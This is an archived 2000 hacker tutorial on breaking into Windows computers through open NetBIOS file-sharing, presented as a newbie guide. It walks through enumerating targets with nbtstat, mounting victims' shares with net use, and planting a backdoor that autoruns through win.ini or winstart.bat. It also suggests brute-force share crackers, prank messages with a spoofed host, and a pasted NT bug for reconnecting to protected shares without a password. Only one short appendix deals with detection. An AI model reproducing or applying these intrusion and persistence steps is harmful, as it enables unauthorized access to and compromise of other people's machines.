home *** CD-ROM | disk | FTP | other *** search
/ Hacker's Arsenal - The Cutting Edge of Hacking / Hacker's Arsenal - The Cutting Edge of Hacking.iso / texts / misc / filesharing.txt < prev    next >
Encoding:
Text File  |  2001-07-11  |  24.2 KB  |  579 lines

  1.   Exploiting File and Print Sharing, by:
  2.   Ghost_Rider (Ghost_Rider9@hotmail.com)
  3.   R a v e N (barakirs@netvision.net.il)
  4.   Date of Release: 4/2/2000
  5.   http://blacksun.box.sk
  6.   Thanks to Oggy, a totally kewl and helpful guy that helped us release this
  7.   tutorial faster.
  8.  
  9. -------------
  10. Introduction
  11. -------------
  12.  
  13.   Remember that I won't go into much detail, because it could start getting
  14. too complicated to explain to newbies. This is a newbies guide after all. If
  15. you want  more detailed information about file sharing search the web, or
  16. read some good NT networks administration books.
  17.  
  18.   Windows has an option called file and print sharing. You can use this
  19. option in order to "share" drive and printers, which means giving access to
  20. files and printers to other people - people on your own network, specific
  21. IPs or even the whole world. When you turn this option on, you leave an open
  22. port (port number 139) that accepts connections and understand the "NetBIOS
  23. protocol", a set of commands (a "language") used to access remote file
  24. and print sharing servers, so that other computers can access the files or
  25. printers you decided to share.
  26.   Now sometimes in a small company LAN this could be extremely useful. For
  27. example, instead of having a seperate printer for each computer, there's 
  28. just
  29. one central printer in a computer that allows file and print sharing. But if
  30. you are using file sharing in your home computer (We've seen many people
  31. that have this option turned on and don't even know what it means! Poor
  32. souls) that is connected to the Internet, that could be quite dangerous 
  33. because
  34. anyone who knows your IP can access your files or printers you're sharing.
  35.   If you don't know if file sharing is active in your computer just go to 
  36. the
  37. control panel and select the Network icon. Now you should see a box where 
  38. you
  39. can see all the network software that you have installed, such as TCP/IP
  40. (Transfer Control Protocol / Internet Protocol. This is the protocol that is
  41. used to transfer data packets over the Internet. A protocol is like a human
  42. language - if two computers understand it, they can communicate) and 
  43. probably a
  44. dial-up adapter (so you could transfer TCP/IP packets over a PPP connection.
  45. PPP, or Point to Point Protocol is the protocol used in dial-up 
  46. connections),
  47. check if you have a line called File and Printer Sharing.
  48.   If you have this then you have sharing activated, to turn it off just 
  49. uncheck
  50. the "I want to be able to give others access to my files" and do the same to
  51. the other. Let's return to the ports thing. Remember port 139? The File 
  52. Sharing
  53. Port is port 139 and it's called NetBIOS Session Service port. When you have
  54. this option enabled you also have 2 other ports open but they use the UDP
  55. protocol instead of the TCP protocol. These ports are 137 (Name Service) and
  56. 138 (Datagram Service). Now if you know anything about DoS attacks (known to
  57. many as nukes) port 139 should sound familiar... There's a kind of DoS 
  58. (stands
  59. for Denial of Service) attack called the OOB nuke (OOB stands for Out Of 
  60. Band)
  61. or "winnuke" that sends an OOB packet to port 139 and makes Windows lose
  62. connection and drop the user to "blue screen mode". If you wish to know more
  63. about DoS attacks, I suggest that you wait for the DoS attacks tutorial (at 
  64. the
  65. time this tutorial was written, the DoS attacks tutorial didn't exist yet.
  66. However, by the time you read it it might already be available, so you can 
  67. try
  68. and get it from http://blacksun.box.sk).
  69.   Okay, enough said, let's get on with it.
  70.      ----------- Getting In -----------
  71.  
  72.   I'm going to explain two ways of breaking into a Windows box that has file
  73. sharing enabled. Just to see how unsafe Windows is, the programs you'll need
  74. come with Windows. isn't that ironic? Okay, of course they come with 
  75. Windows!
  76. Would you actually expect Microsoft to release an OS that supports sharing
  77. without the tools to access shares?
  78.   Now, of course, you can hack file and print sharing through Unix as well.
  79. We'll get to that in the end. Right now we're dealing with Windows here.
  80. Both ways will have equal starts but then in one of the ways you'll keep
  81. typing commands, and in the other way you'll use a GUI (for the ppl who
  82. don't know GUI stands for Graphical User Interface) software. The programs
  83. that you need are called Nbtstat.exe and Net.exe you can find it in the 
  84. windows
  85. directory. These programs run from the MS-DOS prompt. To see the help menu
  86. for nbtstat type nbtstat /? And for net type net /?. Now if you are using
  87. Windows 95 you can have the option NetBios Over TCP/IP disabled and with
  88. that disabled nbtstat won't work and will display a error message like this
  89. one: "Failed to access NBT driver" without the quotes. So if this error
  90. message comes up just go to the control panel, and select the network icon. 
  91. Now
  92. select TCP/IP and choose properties, in the TCP/IP properties box select the
  93. NetBIOS sheet, and enable it checking the box that shouldn't have a cross. 
  94. If
  95. you have Windows 98 the error message shouldn't be displayed unless you have
  96. some kind of a port blocker on port 139 (such as Nukenabber). A lot of 
  97. people
  98. have these things on to detect OOB nuke attempts (usually newbies that can't
  99. use a firewall or lamers that never attempted to. Hopefully not you).
  100.   Now, you must be thinking that enabling NetBIOS over TCP/IP opens the same
  101. three ports, that you use to access a computer. That's true, because if you
  102. want to use the same protocol you'll need to use the same default ports, or
  103. you can use a terminal emulator to connect to port 139 and instead of using
  104. the application I mentioned to type the protocol commands, but that's a real
  105. pain in the ass. Remember that there isn't any problem with the file 
  106. sharing,
  107. because you don't have it enabled, you've just got the ports open (you are
  108. just vulnerable to the DoS attack, you can use a firewall or get a patch for
  109. it at www.theargon.com (click on defenses and find the OOB patch), but I 
  110. don't
  111. know if that would block the incoming data from the host that you are trying
  112. to get in).
  113.  
  114.   Now that you have your NbtStat.exe ready to roll, choose the computer. You
  115. can use the hostname or the IP but you need to use different switches (I'll 
  116. get
  117. to that in a second).
  118.   Let's suppose for a second that this computer's hostname is
  119. Mycomputer.MyIsp.com and the IP is 194.65.34.3. The first thing you need to 
  120. do
  121. is to see if the computer has file sharing enabled. How can you do that? 
  122. It's
  123. easy. Type:
  124.   nbtstat -a hostname
  125.   In this case nbtstat -a Mycomputer.MyIsp.com, but if you want to use the 
  126. IP
  127. you need to type:
  128.   nbtstat -A IP
  129.   In this case nbtstat -A 194.65.34.3
  130. That's strange because DOS isn't case sensitive... but that's how things 
  131. work
  132. (I guess that although DOS isn't case sensitive, this rule doesn't apply to
  133. command parameters. Makes more sense than the opposite).
  134.   Now you might receive two different kinds of replies. One that just says
  135. "Host Not Found". If you get this message, you can give up trying to access
  136. the share part of that computer, because that computer hasn't got the 
  137. NetBIOS
  138. protocol enabled, or you mistyped the hostname or IP. On the other hand, if
  139. you get a table with names, type of sharing and status, it might be your 
  140. lucky
  141. day! Now if you get this table you're half way in. But remember that
  142. sometimes you will get that table but you will not be able to do anything
  143. productive with it, because the computer won't be sharing anything.
  144.   The table should look something like the one that is below:
  145.  
  146. Name                       Type        Status
  147. -----------------------------------------------------------------------------
  148. Host           <20>       UNIQUE      Registered
  149. Hostbug        <00>       GROUP       Registered
  150. Host machine   <03>       UNIQUE      Registered
  151.  
  152.  
  153. -----------------------------------------------------------------------------
  154.   If you want to access your own sharing table just type nbtstat -n
  155.  
  156. -----------------------------------------------------------------------------
  157.   The values in the <xx> brackets can be:
  158.   00 base computernames and workgroups, also in "*" queries
  159.   01 master browser, in magic __MSBROWSE__ cookie
  160.   03 messaging/alerter service; name of logged-in user  <--- This one is 
  161. cool too ---
  162.   20 resource-sharing "server service" name  <--- Check this one ---
  163.   1B domain master-browser name
  164.   1C domain controller name
  165.   1E domain/workgroup master browser election announcement [?]
  166. -------------------------------------------------------------------------------
  167.   I'll talk about messaging/alert service later, if you want to read about 
  168. it
  169.   now, just scroll down until you find Messaging/Alert Service.
  170. -------------------------------------------------------------------------------
  171.   So if the value in the <xx> box is 20 (by the way, the values are 
  172. displayed
  173. in hex code) it means that there is sharing enabled. So now how can someone
  174. get in? Easy. First you need to create an entry in your Lmhosts file (can be
  175. found at c:\windows\Lmhosts (yes, no extension). There is also an example file
  176. at c:\windows\Lmhosts.sam, but this is not the file you should edit. In Windows
  177. NT,  these files can be found at c:\WinNT\Lmhosts and c:\WinNT\Lmhosts.sam). If
  178. you don't have the Lmhosts file, just create it. Read all the information in
  179. the sample file file below.
  180.  
  181. --- Lmhosts.sam file ---
  182. # Copyright (c) 1993-1995 Microsoft Corp.
  183. #
  184. # This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows
  185. # NT.
  186. #
  187. # This file contains the mappings of IP addresses to NT computernames
  188. # (NetBIOS) names.  Each entry should be kept on an individual line.
  189. # The IP address should be placed in the first column followed by the
  190. # corresponding computername. The address and the comptername
  191. # should be separated by at least one space or tab. The "#" character
  192. # is generally used to denote the start of a comment (see the exceptions
  193. # below).
  194. #
  195. # This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
  196. # files and offers the following extensions:
  197. #
  198. #      #PRE
  199. #      #DOM:<domain>
  200. #      #INCLUDE <filename>
  201. #      #BEGIN_ALTERNATE
  202. #      #END_ALTERNATE
  203. #      \0xnn (non-printing character support)
  204. #
  205. # Following any entry in the file with the characters "#PRE" will cause
  206. # the entry to be preloaded into the name cache. By default, entries are
  207. # not preloaded, but are parsed only after dynamic name resolution fails.
  208. #
  209. # Following an entry with the "#DOM:<domain>" tag will associate the
  210. # entry with the domain specified by <domain>. This affects how the
  211. # browser and logon services behave in TCP/IP environments. To preload
  212. # the host name associated with #DOM entry, it is necessary to also add a
  213. # #PRE to the line. The <domain> is always preloaded although it will not
  214. # be shown when the name cache is viewed.
  215. #
  216. # Specifying "#INCLUDE <filename>" will force the RFC NetBIOS (NBT)
  217. # software to seek the specified <filename> and parse it as if it were
  218. # local. <filename> is generally a UNC-based name, allowing a
  219. # centralized lmhosts file to be maintained on a server.
  220. # It is ALWAYS necessary to provide a mapping for the IP address of the
  221. # server prior to the #INCLUDE. This mapping must use the #PRE directive.
  222. # In addtion the share "public" in the example below must be in the
  223. # LanManServer list of "NullSessionShares" in order for client machines to
  224. # be able to read the lmhosts file successfully. This key is under
  225. #
  226. \machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares
  227. # in the registry. Simply add "public" to the list found there.
  228. #
  229. # The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
  230. # statements to be grouped together. Any single successful include
  231. # will cause the group to succeed.
  232. #
  233. # Finally, non-printing characters can be embedded in mappings by
  234. # first surrounding the NetBIOS name in quotations, then using the
  235. # \0xnn notation to specify a hex value for a non-printing character.
  236. #
  237. # The following example illustrates all of these extensions:
  238. #
  239. # 102.54.94.97     rhino         #PRE #DOM:networking  #net group's DC
  240. # 102.54.94.102    "appname  \0x14"                    #special app server
  241. # 102.54.94.123    popular            #PRE             #source server
  242. # 102.54.94.117    localsrv           #PRE             #needed for the
  243. include
  244. #
  245. # #BEGIN_ALTERNATE
  246. # #INCLUDE \\localsrv\public\lmhosts
  247. # #INCLUDE \\rhino\public\lmhosts
  248. # #END_ALTERNATE
  249. #
  250. # In the above example, the "appname" server contains a special
  251. # character in its name, the "popular" and "localsrv" server names are
  252. # preloaded, and the "rhino" server name is specified so it can be used
  253. # to later #INCLUDE a centrally maintained lmhosts file if the "localsrv"
  254. # system is unavailable.
  255. #
  256. # Note that the whole file is parsed including comments on each lookup,
  257. # so keeping the number of comments to a minimum will improve performance.
  258. # Therefore it is not advisable to simply add lmhosts file entries onto the
  259. # end of this file.
  260.  
  261.   To create an entry just open the Lmhosts file in your favorite word
  262. processor and enter your target's IP, press tab and enter the share name
  263. (the one that is listed in the name field). Save the file and exit.
  264.   Now the are two methods to access the remote shares you're after: the
  265. easy way and the cool way.
  266.  
  267.  
  268.  
  269.   ---  The easy way (GUI) ---
  270.  
  271.   If you don't want to have any more trouble just press start, click find
  272. and select find computer. Enter the target's IP address. If your Lmhosts 
  273. entry
  274. is correct, it will show the computer you want in the search window. Just 
  275. click
  276. on the computer icon, and start browsing through that computer like you were
  277. browsing your own computer.
  278.  
  279.    --- The cool way ---
  280.  
  281.   Now it's time to get to know the net.exe program. To access the help menu
  282. just type:
  283.   net /? (in a dos Window).
  284.   I suggest to redirect all the help to a file and then read it
  285. (use net /? > somefile.txt to redirect all output to somefile.txt and 
  286. overwrite
  287. it, or net /? >> somefile.txt to append the output to the file without 
  288. deleting
  289. it). You can also do net option /? to get more help about that option. To
  290. access the share, you create a virtual drive that will be the share in the
  291. other host.
  292.   In order to do this you will need to enter:
  293.   net use drive \\[ipaddress]\[sharename]
  294.  
  295. Where:
  296.  
  297.   - drive is the drive letter you want. For example f: g: z:
  298.   - ipaddress is the target host's IP
  299.  
  300.   - sharename is the name of the share (remember the table we discussed 
  301. about
  302.     before?)
  303.  
  304.   After doing this you just need to type drive: and then browse the new 
  305. drive
  306. using Ms-DOS like if you were in your own hard disk (for example, type:
  307.   f:
  308.   If your new virtual drive has been assigned the letter f).
  309.  
  310.  
  311. Example:
  312.  
  313.   Lets say that you coded a *really cool* backdoor, and you want to run on a
  314. computer that has share enabled, the share name is Flintstone and the 
  315. ipaddress
  316. is 145.42.23.14 .
  317.  
  318.   c:\>net use f: \\145.42.23.14\Flinstone
  319.  
  320.   Now you would just need to copy the backdoor to the new virtual
  321. drive.
  322.  
  323.   c:\>copy backdoor.exe f:\backdoor.exe
  324.  
  325. ----- First Version Text ------
  326.  
  327. Then you would just change drive and run the backdoor.
  328.  
  329.   c:\>f:
  330.   f:\>backdoor.exe
  331.  
  332.   And the backdoor is loaded, so now you can use it to access this computer.
  333.  
  334. --------------------------------
  335. I'm deeply sorry, but what is written between the ----First Version Text---
  336. is wrong.
  337. Using what is there what probably would happen was installing the backdoor
  338. in your own computer and not in the target host. Thanks to Kimmo from the
  339. a-Men Group that correct me.
  340. What you really need to do is to copy the backdoor.exe file to the share,
  341. and then edit the win.ini file adding the line:
  342.  
  343. run=%SystemRoot%\backdoor.exe
  344.  
  345. ---------------------------------------------------------------------------------
  346. NOTE: Why %SystemRoot% ?
  347. We need to use %SystemRoot% instead of F:, because F: is a virtual drive  so
  348. in the the host that drive could not exist, so you use the variable
  349. %SystemRoot% that will return the correct drice.
  350. ---------------------------------------------------------------------------------
  351.  
  352.   Of course, you can also put the backdoor in other places, such as
  353. c:\windows\winstart.bat (enter the line  %SystemRoot%\backdoor.exe as a new
  354. blank line). If there is no such file, create it.
  355.  
  356. -----------------------
  357. Messaging/Alert Service
  358. -----------------------
  359.  
  360.   What's this feature? It doesn't let you access the files for certain, but
  361. it's kinda fun, because what it does is send a message, in Message Box 
  362. Format
  363. to the other host. Watch the face of the guy that is on the computer when he
  364. sees a message box saying "Error: User To Stupid". However, you need to
  365. remember that your host will be shown in the message box, but if you spoof 
  366. your
  367. host, you can have a good laugh with this.
  368.   When using this feature you also need to create a new entry in your 
  369. Lmhosts
  370. file. Remember that this can only be used in a LAN network such as a school 
  371. LAN
  372. with your friends, just to see their faces, nothing more. Even if you wanted 
  373. to
  374. send it over the Internet you couldn't because it uses a broadcast system, 
  375. and
  376. when any broadcasted packets get to a router they are immediately deleted
  377. (security reasons. Off the topic of this tutorial).
  378.   To send a message to the other computer that computer needs to have a <03>
  379. value. As you can see in the table somewhere in the middle of the file, <03
  380. says:
  381.   03  messaging/alerter service; name of logged-in user <--- This one is 
  382. cool
  383. too ---
  384.   So if your target computer has this turned on you can send a message by
  385. typing:
  386.   net send sharename message
  387.   If you are in an LAN and don't want people to mess with you, type:
  388.   net stop messenger
  389.   Doing this you stop the msg service, so you won't be able to send or 
  390. receive
  391. messages using the net send syntax. If you want to enable it again, type:
  392.   net start messenger
  393.   Now you'll be able to send and receive messages again.
  394.  
  395.  
  396. Appendix A: Accessing Windows shares from Unix
  397. ----------------------------------------------
  398. The easiest way is to use an X-Windows program called
  399. LinNeighborhood, which can be downloaded from http://www.bnro.de/~schmidjo/.
  400. However, you can also do that from your console or xterm window, by using 
  401. the
  402. smb commands. To learn more, read the man pages of the following commands:
  403. smbclient  smbmnt     smbmount   smbprint   smbumount
  404.  
  405. Appendix B: Finding sharing hosts
  406. ---------------------------------
  407. Suppose you're an admin that wants to scan his network for vulnerable hosts.
  408. Suppose you're a bored cracker that wants to find possible targets. In both
  409. cases you'd want to have a shares scanner to do the job for you.
  410. You can use a shares scanner to scan whole subnets and look for vulnerable
  411. hosts for you. Get Legion or NbtScan from packetstorm.securify.com.
  412.  
  413. Appendix C: Password-Protected shares
  414. -------------------------------------
  415. Are you an admin that wants to test how strong his password protected shares
  416. are? Are you a cracker that came across a password-protected share and don't
  417. know what to do? You could try to get a brute-force sharing password cracker
  418. that'll try passwords for you until it finds the correct one. Cain is one 
  419. such
  420. program, that also has some other features that you might want to check out.
  421.  
  422. Appendix D: Detecting Sharing Attacks
  423. -------------------------------------
  424. Sharing attacks are usually pretty easy to detect (unless the attacker is
  425. spoofing or performing his attack from another host, thus making it appear 
  426. as
  427. if the other host is really the attacker). The simplest program for the job 
  428. is
  429. Lockdown 2000 (from www.lockdown.com). However, it is quite buggy and 
  430. doesn't
  431. always perform well. You can also try Notron AtGuard (www.norton.com) - I
  432. believe it can also detect sharing attacks, although I havn't tested it yet.
  433.   However, if you're going for the real thing, you should try and get a good
  434. firewall or intrusion detection system. My personal favorite for Unix 
  435. systems
  436. is ipchains (search linux.box.sk, freshmeat.net or any of your other
  437. favorites), while for Windows systems I recommend Firewall-1 (search the 
  438. net,
  439. you should be able to come across it pretty quickly).
  440.  
  441.  
  442. Appendix E: An Easier Way to Access Shares
  443. ------------------------------------------
  444. Got the target's IP address? Good. Got the share name? Good. Now hit start,
  445. then hit run, and then type:
  446. //ip-address(or hostname)/sharename
  447. For example: //65.4.78.203/someshare
  448. You will be able to access the share using an interface similar to what you 
  449. get
  450. when you double-click on the "my computer" icon, and get rid of the need to
  451. assign a virtual drive.
  452.  
  453.  
  454. http://blacksun.box.sk
  455.  
  456. Appendix F: Breaking Password-Protected Shares Without Brute-Forcing
  457. --------------------------------------------------------------------
  458. The following was pasted from the Keen Veracity e-zine, volume 9:
  459.  
  460. [More Bugs In Windows NT]===============================================[Ntwak0]
  461.  
  462. Subject: Password problem In NT when connecting to a share, should I say you
  463. do not need a password in some cases even if it is protected I mean :)
  464.  
  465. Monday, December 27, 1999 by NtWaK0
  466. Tested on NT 4.0 +SP6 + SP6a.
  467.  
  468. I will try to do it by example in this case you will be able to repeat it
  469. --> I am going to map a network share call it X:
  470. E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0
  471. The command completed successfully.
  472. --> I done net view to see the shared resources
  473.  
  474. E:\Tmp>net view \\1.1.1.1
  475. Shared resources at \\1.1.1.1
  476.  
  477. Share name   Type         Used as  Comment
  478. --------------------------------------------------------------------------------
  479. Tmp          Disk         X:
  480. The command completed successfully.
  481.  
  482. --> Now I copyed a file to X: to use the 1.1.1.1 resources.
  483. E:\Tmp>copy test.txt x:
  484.         1 file(s) copied.
  485. --> Now I delete the connection I created to 1.1.1.1 using X:
  486.  
  487.  
  488. E:\Tmp>net use /delete x:
  489. x: was deleted successfully.
  490. --> Now I tryed to recreate the connection using NULL password just for fun i w
  491. as doing this
  492. E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
  493. System error 1326 has occurred.
  494.  
  495. Logon failure: unknown user name or bad password.
  496.  
  497. E:\Tmp>
  498.  
  499. --> It is normal I could not login now I done
  500.  
  501. The Bug:
  502.  
  503. --> Now Reconnect using the command line
  504.  
  505. E:\Tmp>net use x: \\1.1.1.1\tmp passwordhere /user:ntwak0
  506. The command completed successfully.
  507.  
  508. --> I used Explorer to copy the same file test.txt from my drive E:\tmp to the 
  509. mapped drive X:
  510.  
  511. --> I got a msg saying "The file already exist do you wana overwrite it?" 
  512. I said yes, well it is normal I did copy it before as you saw in the step 
  513. above .
  514.  
  515. --> After copying the file in explorer I did right click on X: 
  516. (the mapped drive) and disconnect
  517.  
  518. --> I got a msg box saying "There are currently files open on X:
  519. (connected to \\1.1.1.1\tmp).
  520.  
  521. If you do close the files before disconnecting from the network, data may be
  522. lost.
  523.  
  524. Do you want to disconnect the device anyway?"
  525.  
  526. Then I clicked Yes in this case I have no more connection mapped to X:
  527. In this case I should not be able to connect without password or username 
  528. but not true ;)
  529.         
  530. --> Next I do not know what I tried it I guess for fun In DOS window I typed
  531.  
  532. E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
  533. The command completed successfully.
  534.  
  535. --> W00t I was able to login I did not believe hehe with no password.
  536. --> To make sure i was not dreaming or missing sleep, I was able to repeat it 
  537. like 10 times.
  538.  
  539. But if you do connect and disconnect using net use /delete x: this will work and
  540. you cannot connect with no password like the explore case.
  541.  
  542.  
  543. So you this is a security bug that you can reproduce it in explore and 
  544. DOS command and it has to follow certain steps .
  545. What do I mean by that ? well you have to disconnect using explore and when you
  546. get the msg saying :
  547. "There are currently files open on X:(connected to \\1.1.1.1\tmp) blah blah...
  548. In that case if you disconnect and reconnect right after using no password that
  549. should work. ;)
  550. But if you do it all from the command line this should not work and that 
  551. is normal.
  552.  
  553. Here is an example done all by command line:
  554.  
  555. E:\Tmp>net use x: \\1.1.1.1\tmp " q]a'z/ " /user:ntwak0
  556. The command completed successfully.
  557.  
  558. E:\Tmp>copy test.txt x:test.txt
  559.         1 file(s) copied.
  560.  
  561. E:\Tmp>net use /delete x:
  562. x: was deleted successfully.
  563.  
  564. E:\Tmp>net use x: \\1.1.1.1\tmp "" /user:ntwak0
  565. System error 1326 has occurred.
  566.  
  567. Logon failure: unknown user name or bad password.
  568. E:\Tmp>
  569.  
  570. Cheers,
  571. |-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|
  572. The only secure computer is one that's unplugged, locked in a
  573. safe, and buried 20 feet under the ground in a secret location...
  574. and i'm not even too sure about that one"--Dennis Huges, FBI.
  575. |-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
  576. Live Well Do Good --:)
  577.  
  578. ================================================================================
  579.